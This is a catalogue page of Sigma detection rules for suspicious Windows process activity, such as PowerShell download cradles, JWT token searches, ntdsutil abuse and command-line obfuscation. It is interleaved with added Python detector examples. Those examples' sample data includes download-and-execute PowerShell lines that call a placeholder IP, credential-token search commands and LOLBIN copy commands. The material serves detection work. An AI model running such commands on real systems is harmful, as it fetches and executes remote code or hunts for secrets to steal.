| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003'] |
Suspicious Copy From or To System Directory
Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
Internal MISP references
UUID fff9d2b7-e11c-4a69-93d3-40ef66189767 which can be used as unique global reference for Suspicious Copy From or To System Directory in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html - webarchive
- https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120 - webarchive
- https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2020-07-03 |
| falsepositive | ['Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)', 'When cmd.exe and xcopy.exe are called directly', 'When the command contains the keywords but not in the correct order'] |
| filename | proc_creation_win_susp_copy_system_dir.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036.003'] |
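The false-positive note above ("when the command contains the keywords but not in the correct order") is worth seeing concretely. As an added example (not the rule's own logic or code from this page), the following Python contrasts an order-blind keyword check with a parser that actually recovers source and destination of copy, xcopy and Copy-Item and fires only when exactly one side is a system directory (covering both the "from" and the "to" direction in the rule title). The verb list, the handling of PowerShell's -Path/-Destination parameters and the sample command lines are this example's own assumptions and constructions.

```python
SYSTEM_DIRS = ("\\system32", "\\syswow64", "\\winsxs")
COPY_VERBS = ("copy", "xcopy", "copy-item", "cp")


def _norm(token):
    return token.strip("\"'").lower()


def parse_copy(command_line):
    """Return (source, destination) for copy/xcopy/Copy-Item invocations, or None."""
    toks = command_line.split()
    for i, t in enumerate(toks):
        verb = _norm(t).rsplit("\\", 1)[-1].removesuffix(".exe")
        if verb not in COPY_VERBS:
            continue
        named, positional = {}, []
        rest = toks[i + 1:]
        j = 0
        while j < len(rest):
            a = _norm(rest[j])
            if a in ("-path", "-destination") and j + 1 < len(rest):
                named[a] = _norm(rest[j + 1])      # PowerShell named parameters
                j += 2
                continue
            if a.startswith(("/", "-")):            # copy/xcopy switches such as /y
                j += 1
                continue
            positional.append(a)
            j += 1
        src = named.get("-path") or (positional[0] if positional else None)
        dst = named.get("-destination") or (positional[1] if len(positional) > 1 else None)
        return (src, dst) if src and dst else None
    return None


def _in_system_dir(path):
    return any(d in path for d in SYSTEM_DIRS)


def keyword_match(command_line):
    """Order-blind check: a copy verb and a system directory anywhere on the line.
    This is the shape that produces the false positive noted in the rule metadata."""
    low = command_line.lower()
    return "copy" in low and _in_system_dir(low)


def suspicious_system_copy(command_line):
    """Order-aware check: fire only when exactly one of source/destination is a system directory."""
    parsed = parse_copy(command_line)
    if not parsed:
        return False
    src, dst = parsed
    return _in_system_dir(src) != _in_system_dir(dst)


# Constructed sample command lines (not real telemetry).
SAMPLES = [
    "cmd.exe /c copy C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\cu.exe",
    "xcopy /y C:\\Users\\Public\\evil.dll C:\\Windows\\System32\\",
    'powershell -c "Copy-Item -Destination C:\\ProgramData\\w.exe -Path C:\\Windows\\SysWOW64\\cscript.exe"',
    # keywords present but not a system-directory copy: copies a report, then lists System32
    "cmd.exe /c copy C:\\Temp\\report.txt C:\\Temp\\backup\\ & dir C:\\Windows\\System32",
    # both sides inside System32: routine administration
    "copy C:\\Windows\\System32\\drivers\\etc\\hosts C:\\Windows\\System32\\drivers\\etc\\hosts.bak",
]


if __name__ == "__main__":
    for cl in SAMPLES:
        print(keyword_match(cl), suspicious_system_copy(cl), cl)
```

The last two samples are where the two approaches diverge: the keyword check fires on all five, the parser on the first three only. The price is a parser that has to know each copy tool's syntax, which is why a Sigma rule, limited to string matching on the command line, carries the false-positive note instead.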
MsiExec Web Install
Detects msiexec.exe started with a web address as a parameter, i.e. a package being installed directly from a remote URL.
Internal MISP references
UUID f7b5f842-a6af-4da5-9e95-e32478f3cd2f which can be used as unique global reference for MsiExec Web Install in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2018-02-09 |
| falsepositive | ['False positives depend on scripts and administrative tools used in the monitored environment'] |
| filename | proc_creation_win_msiexec_web_install.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.007', 'attack.command-and-control', 'attack.t1105'] |
Suspicious GUP Usage
Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
Internal MISP references
UUID 0a4f6091-223b-41f6-8743-f322ec84930b which can be used as unique global reference for Suspicious GUP Usage in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2019-02-06 |
| falsepositive | ['Execution of tools named GUP.exe and located in folders other than Notepad++\updater'] |
| filename | proc_creation_win_gup_suspicious_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.001'] |
Security Privileges Enumeration Via Whoami.EXE
Detects whoami.exe executed with the /priv command line flag, which lists all privileges of the current user. This is often used after a privilege escalation attempt.
Internal MISP references
UUID 97a80ec7-0e2f-4d05-9ef4-65760e634f6b which can be used as unique global reference for Security Privileges Enumeration Via Whoami.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-05-05 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_whoami_priv_discovery.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.discovery', 'attack.t1033'] |
Potentially Suspicious JWT Token Search Via CLI
Detects potentially suspicious searches for JWTs via the CLI by looking for the string "eyJ0eX" or "eyJhbG", the base64 prefix of a JWT header that begins with "typ" or "alg". JWTs are widely used as access tokens across applications and services such as Microsoft 365, Azure, AWS and Google Cloud, so threat actors may search for them on disk to steal them for lateral movement or privilege escalation.
Internal MISP references
UUID 6d3a3952-6530-44a3-8554-cf17c116c615 which can be used as unique global reference for Potentially Suspicious JWT Token Search Via CLI in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), kagebunsher |
| creation_date | 2022-10-25 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_jwt_token_search.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1528', 'attack.t1552.001'] |
Related clusters
To see the related clusters, click here.
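Where the two literals in the description come from, and which tokens they miss, shown with an added Python example. This is not part of the Sigma rule or of this page: the header objects and the Sysmon-style process-creation events are constructed, and `is_jwt_search` is a simplified stand-in for the rule's command-line match rather than its actual detection logic.

```python
import base64
import json

# The two literals the rule description names: the start of a base64-encoded
# JWT header whose first key is "typ" or "alg".
JWT_PREFIXES = ("eyJ0eX", "eyJhbG")

# Constructed JWT header objects used to show where the prefixes come from.
SAMPLE_HEADERS = {
    "typ_first": {"typ": "JWT", "alg": "HS256"},
    "alg_first": {"alg": "RS256", "typ": "JWT"},
    "kid_first": {"kid": "example-key-1", "alg": "HS256"},  # first key is neither typ nor alg
}

# Constructed process-creation events (Sysmon-style field names), not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": r'findstr /s /i "eyJhbG" C:\Users\*\AppData\Local\*.log'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c \"Get-ChildItem -Recurse | Select-String -Pattern 'eyJ0eX'\""},
    {"Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": r'findstr /s "password" C:\Users\*\*.txt'},
]


def encode_header(header: dict) -> str:
    """Base64url-encode a JWT header as RFC 7519 does: compact JSON, padding stripped."""
    raw = json.dumps(header, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def decode_prefix(prefix: str) -> str:
    """Decode a base64 prefix back to the JSON bytes it encodes (re-adds padding)."""
    padded = prefix + "=" * (-len(prefix) % 4)
    return base64.urlsafe_b64decode(padded).decode(errors="replace")


def header_is_covered(header: dict) -> bool:
    """True when a token with this header would be caught by the two-prefix search."""
    return encode_header(header).startswith(JWT_PREFIXES)


def is_jwt_search(command_line: str) -> bool:
    """Simplified stand-in for the rule: flag a command line carrying either prefix.

    Matching is case-insensitive to mirror Sigma's default string semantics; base64
    itself is case-sensitive, so folding case only widens the match.
    """
    lowered = command_line.lower()
    return any(p.lower() in lowered for p in JWT_PREFIXES)


def find_jwt_searches(events: list) -> list:
    """Return the events whose command line looks like a JWT hunt."""
    return [e for e in events if is_jwt_search(e["CommandLine"])]


if __name__ == "__main__":
    for p in JWT_PREFIXES:
        print(f"{p!r} decodes to {decode_prefix(p)!r}")
    for name, h in SAMPLE_HEADERS.items():
        print(f"{name}: {encode_header(h)[:12]}... covered={header_is_covered(h)}")
    for e in find_jwt_searches(SAMPLE_EVENTS):
        print("HIT:", e["CommandLine"])
```

Decoding the prefixes gives `{"ty` and `{"al`, which is why they catch headers that start with `typ` or `alg`. A header whose first key is something else (the constructed `kid_first` case) encodes to a different prefix and slips past a search for these two strings, so treat the rule as a cheap tripwire rather than complete coverage.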
Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)
Detects execution of ntdsutil.exe to perform actions such as restoring snapshots, activity that can be abused to obtain a copy of the Active Directory database (NTDS.dit).
Internal MISP references
UUID a58353df-af43-4753-bad0-cd83ef35eef5 which can be used as unique global reference for Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) in MISP communities and other software using the MISP galaxy
External references
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments - webarchive
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11) - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_susp_usage.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-14 |
| falsepositive | ['Legitimate usage to restore snapshots', 'Legitimate admin activity'] |
| filename | proc_creation_win_ntdsutil_susp_usage.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.003'] |
Related clusters
To see the related clusters, click here.
Weak or Abused Passwords In CLI
Detects weak or frequently abused passwords (ones seen in use by threat actors) passed on the command line. An example would be a threat actor creating a new user via the net command and supplying the password inline.
Internal MISP references
UUID 91edcfb1-2529-4ac2-9ecc-7617f895c7e4 which can be used as unique global reference for Weak or Abused Passwords In CLI in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2022/09/26/bumblebee-round-two/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments - webarchive
- https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-14 |
| falsepositive | ['Legitimate usage of the passwords by users via commandline (should be discouraged)', 'Other currently unknown false positives'] |
| filename | proc_creation_win_susp_weak_or_abused_passwords.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution'] |
Suspicious PowerShell Download and Execute Pattern
Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
Internal MISP references
UUID e6c54d94-498c-4562-a37c-b469d8e9a275 which can be used as unique global reference for Suspicious PowerShell Download and Execute Pattern in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html - webarchive
- https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-02-28 |
| falsepositive | ['Software installers that pull packages from remote systems and execute them'] |
| filename | proc_creation_win_powershell_susp_download_patterns.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Related clusters
To see the related clusters, click here.
Change Default File Association Via Assoc
Detects file association changes using the builtin "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
Internal MISP references
UUID 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 which can be used as unique global reference for Change Default File Association Via Assoc in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Timur Zinniatullin, oscd.community |
| creation_date | 2019-10-21 |
| falsepositive | ['Admin activity'] |
| filename | proc_creation_win_cmd_assoc_execution.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.001'] |
Related clusters
To see the related clusters, click here.
Suspicious Rundll32 Execution With Image Extension
Detects the execution of Rundll32.exe with DLL files masquerading as image files
Internal MISP references
UUID 4aa6040b-3f28-44e3-a769-9208e5feb5ec which can be used as unique global reference for Suspicious Rundll32 Execution With Image Extension in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Hieu Tran |
| creation_date | 2023-03-13 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_rundll32_susp_execution_with_image_extension.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.011'] |
Related clusters
To see the related clusters, click here.
Potential Lateral Movement via Windows Remote Shell
Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.
Internal MISP references
UUID 79df3f68-dccb-48e9-9171-b75cbc37c51d which can be used as unique global reference for Potential Lateral Movement via Windows Remote Shell in MISP communities and other software using the MISP galaxy
External references
- https://www.ired.team/offensive-security/lateral-movement/winrs-for-lateral-movement - webarchive
- https://cardinalops.com/blog/living-off-winrm-abusing-complexity-in-remote-management/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrshost_command_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Liran Ravich |
| creation_date | 2025-10-22 |
| falsepositive | ['Legitimate use of WinRM within the organization'] |
| filename | proc_creation_win_winrshost_command_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.t1021.006'] |
Related clusters
To see the related clusters, click here.
Query Usage To Exfil Data
Detects usage of the system binary "query.exe" to gather information such as "sessions" and "processes" for later use or exfiltration.
Internal MISP references
UUID 53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2 which can be used as unique global reference for Query Usage To Exfil Data in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-01 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_query_session_exfil.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
PowerShell Download and Execution Cradles
Detects PowerShell download and execution cradles.
Internal MISP references
UUID 85b0b087-eddf-4a2b-b033-d771fa2b9775 which can be used as unique global reference for PowerShell Download and Execution Cradles in MISP communities and other software using the MISP galaxy
External references
- https://labs.withsecure.com/publications/fin7-target-veeam-servers - webarchive
- https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-03-24 |
| falsepositive | ['Some PowerShell installers were seen using similar combinations. Apply filters accordingly'] |
| filename | proc_creation_win_powershell_download_iex.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059'] |
Related clusters
To see the related clusters, click here.
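The two PowerShell download rules above ("Suspicious PowerShell Download and Execute Pattern" and "PowerShell Download and Execution Cradles") both match on substrings of the command line, and the first one warns that the backend must match case-insensitively. The added Python example below shows why: the same cradle with randomised letter case is invisible to a case-sensitive match. This is illustrative code, not the rules' own logic; the command lines are constructed and the token lists are an assumed cross-section of cradle building blocks, not the rules' exact strings.

```python
import re

# Constructed process-creation command lines; none are taken from the page or from real telemetry.
SAMPLE_COMMAND_LINES = [
    # classic cradle: fetch a script and hand it straight to Invoke-Expression
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\"",
    # the same cradle with randomised letter case
    "PoWeRsHeLl -NoP -c \"iEx (nEw-oBjEcT nEt.wEbClIeNt).dOwNlOaDsTrInG('http://198.51.100.7/a.ps1')\"",
    # cmdlet form piped into Invoke-Expression
    "powershell -c \"Invoke-WebRequest http://198.51.100.7/b.ps1 -UseBasicParsing | Invoke-Expression\"",
    # download to disk without executing anything
    "powershell -c \"(New-Object Net.WebClient).DownloadFile('http://198.51.100.7/tool.zip', 'C:\\Temp\\tool.zip')\"",
    # benign
    "powershell -c \"Get-Process | Sort-Object CPU -Descending\"",
]

# Assumed token lists: a reasonable cross-section of cradle building blocks,
# not the exact strings of either rule.
DOWNLOAD_PATTERNS = [
    r"Net\.WebClient",
    r"\.Download(?:String|Data|File)\(",
    r"\bInvoke-WebRequest\b",
    r"\biwr\b",
    r"\bStart-BitsTransfer\b",
]
EXECUTE_PATTERNS = [
    r"\bIEX\b",
    r"\bInvoke-Expression\b",
]


def classify(command_line: str, case_sensitive: bool = False):
    """Return 'download_and_execute', 'download_only' or None for one command line.

    case_sensitive=False mirrors what the rule description asks of the backend;
    passing True shows what a case-sensitive backend would miss.
    """
    flags = 0 if case_sensitive else re.IGNORECASE
    downloads = any(re.search(p, command_line, flags) for p in DOWNLOAD_PATTERNS)
    executes = any(re.search(p, command_line, flags) for p in EXECUTE_PATTERNS)
    if downloads and executes:
        return "download_and_execute"
    if downloads:
        return "download_only"
    return None


def scan(command_lines, case_sensitive: bool = False) -> dict:
    """Map each command line index to its verdict, dropping the ones that are clean."""
    return {i: v for i, c in enumerate(command_lines)
            if (v := classify(c, case_sensitive)) is not None}


if __name__ == "__main__":
    print("case-insensitive:", scan(SAMPLE_COMMAND_LINES))
    print("case-sensitive:  ", scan(SAMPLE_COMMAND_LINES, case_sensitive=True))
```

Splitting the verdict into "download only" and "download and execute" is what separates the high-severity cradle from an installer that merely fetches a package, which is the false-positive class both rules name.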
Potential Execution of Sysinternals Tools
Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools
Internal MISP references
UUID 7cccd811-7ae9-4ebe-9afd-cb5c406b824b which can be used as unique global reference for Potential Execution of Sysinternals Tools in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Markus Neis |
| creation_date | 2017-08-28 |
| falsepositive | ['Legitimate use of SysInternals tools', 'Programs that use the same command line flag'] |
| filename | proc_creation_win_sysinternals_eula_accepted.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.resource-development', 'attack.t1588.002'] |
Related clusters
To see the related clusters, click here.
Suspicious WindowsTerminal Child Processes
Detects suspicious child processes spawned by the Windows Terminal application, which could be a sign of persistence via a malicious Windows Terminal profile
Internal MISP references
UUID 8de89e52-f6e1-4b5b-afd1-41ecfa300d48 which can be used as unique global reference for Suspicious WindowsTerminal Child Processes in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-25 |
| falsepositive | ['Other legitimate "Windows Terminal" profiles'] |
| filename | proc_creation_win_windows_terminal_susp_children.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.persistence'] |
Service StartupType Change Via PowerShell Set-Service
Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
Internal MISP references
UUID 62b20d44-1546-4e61-afce-8e175eb9473c which can be used as unique global reference for Service StartupType Change Via PowerShell Set-Service in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-03-04 |
| falsepositive | ['False positives may occur with troubleshooting scripts'] |
| filename | proc_creation_win_powershell_set_service_disabled.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image
Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
Internal MISP references
UUID 584bca0f-3608-4402-80fd-4075ff6072e3 which can be used as unique global reference for Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image in MISP communities and other software using the MISP galaxy
External references
- https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_unicode_img.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Florian Roth (Nextron Systems), Josh Nickels |
| creation_date | 2024-09-02 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_cli_obfuscation_unicode_img.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1027'] |
Related clusters
To see the related clusters, click here.
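What "command-line obfuscation using unicode characters" looks like in practice, and why a detector must not simply fire on every non-ASCII byte, shown with an added Python example that is not part of the rule or this page. The lookalike character table, the set of "suspicious" images and the Sysmon-style events are all constructed assumptions; whether a given target binary really folds a given character back to `-` or `s` must be verified per binary (the referenced write-up above does that), so the script only reports indicators.

```python
import unicodedata

# Assumed table of characters that a Windows argument parser or best-fit code-page
# conversion may fold into a plain '-' or '/', letting "\u2012nop" stand in for "-nop".
# Illustrative, drawn from the Unicode dash and slash ranges; not the rule's own list.
OPTION_LOOKALIKES = {
    "\u2010": "-", "\u2011": "-", "\u2012": "-", "\u2013": "-", "\u2014": "-", "\u2015": "-",
    "\u2044": "/", "\u2215": "/",
}

# Assumed scope for "From Suspicious Image": binaries whose command lines are worth the noise.
SUSPICIOUS_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "reg.exe", "rundll32.exe", "wscript.exe"}

# Constructed Sysmon-style events, not real telemetry.
SAMPLE_EVENTS = [
    # U+2012 FIGURE DASH in place of '-' on every switch
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell \u2012nop \u2012w hidden \u2012c calc.exe"},
    # U+02E2 MODIFIER LETTER SMALL S, which NFKC folds back to a plain 's'
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ep bypa\u02e2\u02e2 -c calc.exe"},
    # legitimate non-ASCII (umlauts, sharp s) that must not fire
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo Gr\u00fc\u00dfe > C:\\Users\\j\u00fcrgen\\note.txt"},
    # an en dash in an ordinary document name, outside the scoped images
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe \"C:\\docs\\Q1\u2013Q2 report.txt\""},
]


def image_name(path: str) -> str:
    """Last path component, lower-cased, for comparison against SUSPICIOUS_IMAGES."""
    return path.rsplit("\\", 1)[-1].lower()


def deobfuscate(command_line: str) -> str:
    """Fold lookalike option characters and NFKC-normalise the rest, yielding the
    string the target parser would effectively see."""
    folded = "".join(OPTION_LOOKALIKES.get(c, c) for c in command_line)
    return unicodedata.normalize("NFKC", folded)


def analyze(event: dict) -> list:
    """Return the obfuscation indicators found in one event (empty list = clean)."""
    if image_name(event["Image"]) not in SUSPICIOUS_IMAGES:
        return []
    cmd = event["CommandLine"]
    findings = []
    if any(c in OPTION_LOOKALIKES for c in cmd):
        findings.append("lookalike_option_prefix")
    # Characters with a compatibility decomposition (superscripts, fullwidth forms)
    # change under NFKC; accented letters such as "ü" do not, so they stay quiet.
    if unicodedata.normalize("NFKC", cmd) != cmd:
        findings.append("nfkc_normalizes")
    return findings


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyze(ev) or "clean", "->", deobfuscate(ev["CommandLine"]))
```

Scoping on the image is what keeps the en dash in a document name from alerting; the de-obfuscated string is what an analyst would feed into the usual keyword rules afterwards.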
Suspicious Download from Office Domain
Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
Internal MISP references
UUID 00d49ed5-4491-4271-a8db-650a4ef6f8c1 which can be used as unique global reference for Suspicious Download from Office Domain in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2021-12-27 |
| falsepositive | ['Scripts or tools that download attachments from these domains (OneNote, Outlook 365)'] |
| filename | proc_creation_win_susp_download_office_domain.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.resource-development', 'attack.t1105', 'attack.t1608'] |
Related clusters
To see the related clusters, click here.
Response File Execution Via Odbcconf.EXE
Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
Internal MISP references
UUID 5f03babb-12db-4eec-8c82-7b4cb5580868 which can be used as unique global reference for Response File Execution Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - webarchive
- https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-22 |
| falsepositive | ['The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary.'] |
| filename | proc_creation_win_odbcconf_response_file.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.008'] |
Related clusters
To see the related clusters, click here.
Service Started/Stopped Via Wmic.EXE
Detects usage of wmic to start or stop a service
Internal MISP references
UUID 0b7163dc-7eee-4960-af17-c0cd517f92da which can be used as unique global reference for Service Started/Stopped Via Wmic.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-20 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wmic_service_manipulation.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1047'] |
Related clusters
To see the related clusters, click here.
PowerShell Execution With Potential Decryption Capabilities
Detects PowerShell commands that decrypt an ".LNK" file to drop the next stage of the malware.
Internal MISP references
UUID 434c08ba-8406-4d15-8b24-782cb071a691 which can be used as unique global reference for PowerShell Execution With Potential Decryption Capabilities in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-06-30 |
| falsepositive | ['Unlikely'] |
